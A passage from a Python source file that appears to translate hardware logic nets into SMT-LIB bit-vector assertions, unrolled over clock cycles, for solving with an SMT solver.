Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (= %s (bvxor %s %s)))\n" % (
log_net.dests[0].name, log_net.args[0].name, log_net.args[1].name))
elif log_net.op == 'n':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (= %s (bvnand %s %s)))\n" % (
log_net.dests[0].name, log_net.args[0].name, log_net.args[1].name))
elif log_net.op == '~':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
output_file.write("(assert (= %s (bvnot %s)))\n" % (log_net.dests[0].name, log_net.args[0].name))
elif log_net.op == '+':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
a = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
a = a + " (concat #b1 " + log_net.args[i].name + ") "
else:
a = a + " ((_ zero_extend 1) " + log_net.args[i].name + ") "
output_file.write("(assert (= %s (bvadd %s)))\n" % (log_net.dests[0].name, a))
elif log_net.op == '-':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
sub = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
sub = sub + " (concat #b1 " + log_net.args[i].name + ") "
else:
sub = sub + " ((_ zero_extend 1) " + log_net.args[i].name + ") "
output_file.write("(assert (= %s (bvsub %s)))\n" % (log_net.dests[0].name, sub))
elif log_net.op == '*':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
mul = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
mu = ''
for j in range(0, log_net.args[i].bitwidth):
mu = mu + '1'
mul = mul + " (concat #b" + mu + " " + log_net.args[i].name + ") "
else:
mul = mul + " ((_ zero_extend " + str(log_net.args[i].bitwidth) + ") " + log_net.args[
i].name + ") "
output_file.write("(assert (= %s (bvmul %s)))\n" % (log_net.dests[0].name, mul))
elif log_net.op == '=':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (ite (= %s %s) (= %s #b1) (= %s #b0)))\n" % (
log_net.args[0].name, log_net.args[1].name, log_net.dests[0].name, log_net.dests[0].name))
elif log_net.op == '<':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (ite (bvult %s %s) (= %s #b1) (= %s #b0)))\n" % (
log_net.args[0].name, log_net.args[1].name, log_net.dests[0].name, log_net.dests[0].name))
elif log_net.op == '>':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
output_file.write("(assert (ite (bvugt %s %s) (= %s #b1) (= %s #b0)))\n" % (
log_net.args[0].name, log_net.args[1].name, log_net.dests[0].name, log_net.dests[0].name))
elif log_net.op == 'w':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
output_file.write("(assert (= %s %s))\n" % (log_net.dests[0].name, log_net.args[0].name))
elif log_net.op == 'x':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
if log_net.args[2].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[2].name, log_net.args[2].bitwidth))
Declare.append(log_net.args[2].name)
output_file.write("(assert (ite (= %s #b0) (= %s %s) (= %s %s)))\n" % (
log_net.args[0].name, log_net.dests[0].name, log_net.args[1].name, log_net.dests[0].name,
log_net.args[2].name))
elif log_net.op == 'c':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
c = ''
for i in range(len(log_net.args)):
if log_net.args[i].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[i].name, log_net.args[i].bitwidth))
Declare.append(log_net.args[i].name)
c = c + ' ' + log_net.args[i].name
output_file.write("(assert (= %s (concat %s)))\n" % (log_net.dests[0].name, c))
elif log_net.op == 's':
if log_net.dests[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
string = ''
for i in log_net.op_param[::-1]:
string = string + "((_ extract " + str(i) + " " + str(i) + ")" + " " + log_net.args[0].name + ") "
output_file.write("(assert (= %s (concat %s)))\n" % (log_net.dests[0].name, string))
elif log_net.op == 'm': ########6/2
if not log_net.op_param[1].name in initializedMem:
initializedMem.append(log_net.op_param[1].name)
output_file.write("(declare-const %s (Array (_ BitVec %s) (_ BitVec %s)))\n" % (
log_net.op_param[1].name, log_net.op_param[1].addrwidth,
log_net.op_param[1].bitwidth))
if log_net.dests[0].name not in Declare:
output_file.write(
"(declare-const %s (_ BitVec %s))\n" % (log_net.dests[0].name, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name)
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
output_file.write("(assert (= (select %s %s) %s))\n" % (
log_net.op_param[1].name, log_net.args[0].name, log_net.dests[0].name))
# node_cntr += 1
elif log_net.op == '@':
if not log_net.op_param[1].name in initializedMem:
initializedMem.append(log_net.op_param[1].name)
output_file.write("(declare-const %s (Array (_ BitVec %s) (_ BitVec %s)))\n" % (
log_net.op_param[1].name, log_net.op_param[1].addrwidth,
log_net.op_param[1].bitwidth))
if log_net.args[0].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[0].name, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name)
if log_net.args[1].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[1].name, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name)
if log_net.args[2].name not in Declare:
output_file.write("(declare-const %s (_ BitVec %s))\n" % (log_net.args[2].name, log_net.args[2].bitwidth))
Declare.append(log_net.args[2].name)
output_file.write("(assert (ite (= %s #b1) (= (store %s %s %s) %s) (= %s %s)))\n" % (log_net.args[2].name, log_net.op_param[1].name, log_net.args[0].name, log_net.args[1].name, log_net.op_param[1].name, log_net.op_param[1].name, log_net.op_param[1].name))
# node_cntr += 1
else:
pass
else:
for cir in range(0, circle):
for log_net in list(block.logic_subset()):
if log_net.op == '&':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvand %s_%s %s_%s)))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir, log_net.args[1].name, cir))
elif log_net.op == '|':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvor %s_%s %s_%s)))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir, log_net.args[1].name, cir))
elif log_net.op == '^':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvxor %s_%s %s_%s)))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir, log_net.args[1].name, cir))
elif log_net.op == 'n':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvnand %s_%s %s_%s)))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir, log_net.args[1].name, cir))
elif log_net.op == '~':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvnot %s_%s)))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir))
elif log_net.op == '+':
a = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
a = a + " (concat #b1 " + log_net.args[i].name + '_' + str(cir) + ") "
else:
a = a + " ((_ zero_extend 1) " + log_net.args[i].name + '_' + str(cir) + ") "
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvadd %s)))\n" % (log_net.dests[0].name, cir, a))
elif log_net.op == '-':
sub = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
sub = sub + " (concat #b1 " + log_net.args[i].name + '_' + str(cir) + ") "
else:
sub = sub + " ((_ zero_extend 1) " + log_net.args[i].name + '_' + str(cir) + ") "
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvsub %s)))\n" % (log_net.dests[0].name, cir, sub))
elif log_net.op == '*':
mul = ''
for i in range(0, 2):
if (log_net.args[i].name in consts) and (log_net.args[i].signed):
mu = ''
for j in range(0, log_net.args[i].bitwidth):
mu = mu + '1'
mul = mul + " (concat #b" + mu + " " + log_net.args[i].name + '_' + str(cir) + ") "
else:
mul = mul + " ((_ zero_extend " + str(log_net.args[i].bitwidth) + ") " + log_net.args[
i].name + '_' + str(cir) + ") "
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (bvmul %s)))\n" % (log_net.dests[0].name, cir, mul))
elif log_net.op == '=':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (ite (= %s_%s %s_%s) (= %s_%s #b1) (= %s_%s #b0)))\n" % (log_net.args[0].name, cir, log_net.args[1].name, cir, log_net.dests[0].name, cir,
log_net.dests[0].name, cir))
elif log_net.op == '<':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (ite (bvult %s_%s %s_%s) (= %s_%s #b1) (= %s_%s #b0)))\n" % (log_net.args[0].name, cir, log_net.args[1].name, cir, log_net.dests[0].name, cir,
log_net.dests[0].name, cir))
elif log_net.op == '>':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
output_file.write("(assert (ite (bvugt %s_%s %s_%s) (= %s_%s #b1) (= %s_%s #b0)))\n" % (log_net.args[0].name, cir, log_net.args[1].name, cir, log_net.dests[0].name, cir,
log_net.dests[0].name, cir))
elif log_net.op == 'w':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
output_file.write("(assert (= %s_%s %s_%s))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir))
elif log_net.op == 'x':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
if log_net.args[2].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[2].name, cir, log_net.args[2].bitwidth))
Declare.append(log_net.args[2].name + '_' + str(cir))
output_file.write("(assert (ite (= %s_%s #b0) (= %s_%s %s_%s) (= %s_%s %s_%s)))\n" % (log_net.args[0].name, cir, log_net.dests[0].name, cir, log_net.args[1].name, cir,log_net.dests[0].name, cir, log_net.args[2].name, cir))
elif log_net.op == 'c':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
c = ''
for i in range(len(log_net.args)):
if log_net.args[i].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (log_net.args[i].name, str(cir), log_net.args[i].bitwidth))
Declare.append(log_net.args[i].name + '_' + str(cir))
c = c + ' ' + log_net.args[i].name + '_' + str(cir)
output_file.write("(assert (= %s_%s (concat %s)))\n" % (log_net.dests[0].name, str(cir), c))
elif log_net.op == 's':
string = ''
for i in log_net.op_param[::-1]:
string = string + "((_ extract " + str(i) + " " + str(i) + ")" + " " + log_net.args[
0].name + '_' + str(cir) + ") "
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
output_file.write("(assert (= %s_%s (concat %s)))\n" % (log_net.dests[0].name, cir, string))
elif log_net.op == 'r':
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if cir == 0:
pass
else:
output_file.write(
"(assert (= %s_%s %s_%s))\n" % (log_net.dests[0].name, cir, log_net.args[0].name, cir - 1))
elif log_net.op == 'm': #####6/2
# mem.append(log_net.op_param[1].name + "_" + str(cir))
if log_net.op_param[1].name not in initializedMem:
initializedMem.append(log_net.op_param[1].name)
output_file.write("(declare-const %s (Array (_ BitVec %s) (_ BitVec %s)))\n" % (
log_net.op_param[1].name, log_net.op_param[1].addrwidth,
log_net.op_param[1].bitwidth))
if log_net.dests[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.dests[0].name, cir, log_net.dests[0].bitwidth))
Declare.append(log_net.dests[0].name + '_' + str(cir))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
output_file.write("(assert (= (select %s %s_%s) %s_%s))\n" % (log_net.op_param[1].name, log_net.args[0].name, cir, log_net.dests[0].name, cir))
# node_cntr += 1
elif log_net.op == '@':
if not log_net.op_param[0] in initializedMem:
initializedMem.append(log_net.op_param[0])
output_file.write("(declare-const %s (Array (_ BitVec %s) (_ BitVec %s)))\n" % (
log_net.op_param[1].name, log_net.op_param[1].addrwidth,
log_net.op_param[1].bitwidth))
if log_net.args[0].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[0].name, cir, log_net.args[0].bitwidth))
Declare.append(log_net.args[0].name + '_' + str(cir))
if log_net.args[1].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[1].name, cir, log_net.args[1].bitwidth))
Declare.append(log_net.args[1].name + '_' + str(cir))
if log_net.args[2].name + '_' + str(cir) not in Declare:
output_file.write("(declare-const %s_%s (_ BitVec %s))\n" % (
log_net.args[2].name, cir, log_net.args[2].bitwidth))
Declare.append(log_net.args[2].name + '_' + str(cir))
output_file.write("(assert (ite (= %s_%s #b1) (= (store %s %s_%s %s_%s) %s)) (= %s %s))\n" % (log_net.args[2].name, cir, log_net.op_param[1].name, log_net.args[0].name, cir, log_net.args[1].name, cir, log_net.op_param[1].name, log_net.op_param[1].name, log_net.op_param[1].name))
# node_cntr += 1
else:
pass
if circle == 1:
for i in consts:
if consts[i].signed:
con = bin(pow(2, consts[i].bitwidth) - consts[i].val)
zero = ""
for j in range(0, consts[i].bitwidth - len(con) + 2):
zero = zero + "0"
output_file.write("(assert (= %s (bvneg %s)))\n" % (consts[i].name, "#b" + zero + con[2:]))
else:
con = bin(consts[i].val)
zero = ""
for j in range(0, consts[i].bitwidth - len(con) + 2):
zero = zero + "0"
output_file.write("(assert (= %s %s))\n" % (consts[i].name, "#b" + zero + bin(consts[i].val)[2:]))
else:
for cir in range(0, circle):
for i in consts:
if consts[i].signed:
con = bin(pow(2, consts[i].bitwidth) - consts[i].val)
zero = ""
for j in range(0, consts[i].bitwidth - len(con) + 2):
zero = zero + "0"
output_file.write("(assert (= %s_%s (bvneg %s)))\n" % (consts[i].name, cir, "#b" + zero + con[2:]))
else:
con = bin(consts[i].val)
zero = ""
for j in range(0, consts[i].bitwidth - len(con) + 2):
zero = zero + "0"
output_file.write("(assert (= %s_%s %s))\n" % (consts[i].name, cir, "#b" + zero + bin(consts[i].val)[2:]))
return 0
##################################################################
# get inputs for n cycles
##################################################################
def gen_inputs_for_n_cycles(block, n=1):
inps_cycles = []
for i in block.wirevector_subset(Input):
if n == 1:
inp_cycle = i.name
inps_cycles.append(inp_cycle)
else:
for cycle in range(n):
inp_cycle = i.name + "_%s" % str(cycle)
inps_cycles.append(inp_cycle)
return inps_cycles
def gen_outputs_for_n_cycles(block, n=1):
otps_cycles = []
for i in block.wirevector_subset(Output):
if n == 1:
otp_cycle = i.name
otps_cycles.append(otp_cycle)
else:
for cycle in range(n):
otp_cycle = i.name + "_%s" % str(cycle)
otps_cycles.append(otp_cycle)
return otps_cycles
def get_value_name(value):
s = value.split('_')[0:-1]
if len(s) == 1:
return s[0]
else:
signal = s[0]
for i in range(1, len(s)):
signal = signal + '_' + s[i]
return signal
def get_value_bitwidth(block, value):
for i in block.wirevector_subset():
if get_value_name(value) == i.name:
return i.bitwidth
print('error: %s is not in block.'%(get_value_name(value)) )
return 0
# mem=[]
# mux={mux1:[name, bitwith],mux2:...}
# mux_clock = {mux1:[0,1,0,1,...], mux2:[1,0,1,0,...]}
# initial_values={a_0:'0', b_0:'1',...}
def solve_smt(block, mux, mux_clock, cycle, initial_values=None, rom_blocks=None):
inputs = gen_inputs_for_n_cycles(block, cycle)
with tempfile.TemporaryFile(mode='w+') as output_file:
translate_to_smt(block, output_file, cycle, rom_blocks)
for i in mux:
if cycle == 1:
output_file.write("(assert (= %s %s))\n" % (mux[i][0], transfer_to_bin(mux_clock[i][0], mux[i][1])))
else:
for c in range(0, cycle):
output_file.write("(assert (= %s_%s %s))\n" % (mux[i][0], c, transfer_to_bin(mux_clock[i][c], mux[i][1])))
if initial_values is None:
for i in block.wirevector_subset(Register):
